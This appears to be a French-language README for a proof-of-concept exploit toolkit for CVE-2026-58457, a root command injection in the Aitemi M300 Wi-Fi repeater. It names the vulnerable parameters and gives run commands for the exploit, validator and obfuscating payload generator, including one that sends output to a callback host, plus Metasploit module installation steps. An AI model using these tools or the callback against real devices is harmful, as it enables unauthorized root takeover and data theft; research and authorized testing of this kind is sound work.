
PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.
[!WARNING] Ce code est fourni EN L'ÉTAT à des fins éducatives et de recherche uniquement. N'utilisez pas ce PoC sur des systèmes de production, des environnements partagés ou des cibles non autorisées.
- L'exécution ou l'hébergement de ce code peut déclencher des détections antivirus, des alertes de surveillance de sécurité ou des conséquences juridiques en cas de mauvaise utilisation.
- Les auteurs et les responsables du dépôt déclinent toute responsabilité en cas de dommage, de mauvaise utilisation ou d'activité illégale résultant de ce code.
- À utiliser exclusivement dans des environnements de laboratoire isolés avec une autorisation appropriée. Destiné uniquement à la recherche défensive, à l'analyse des vulnérabilités et aux tests de l'équipe bleue.
Une vulnérabilité d'injection de commandes système non authentifiée existe dans le gestionnaire smacfilter_conf. Les paramètres GET name, enable et mac sont transmis sans assainissement à un appel sprintf() qui construit des commandes UCI exécutées en root.
poc.py - Exploit complet avec prise en charge HTTPS, nouvelles tentatives, délai d'attente et exfiltration par callback.val.py - Validateur de vulnérabilité sûr et passif (utilise la commande id inoffensive).gen.py - Générateur de payloads avancé avec plusieurs techniques d'obfuscation.MITIGATIONS.md - Mesures défensives recommandées.exploit/.pip install requests
python3 val.py --target 192.168.1.100
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
python3 gen.py -c "id" -n 10
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
msfconsole -q -x "reload_all"
Les étoiles et les contributions sont les bienvenues - en particulier les améliorations des contournements ou des variantes de firmware supplémentaires.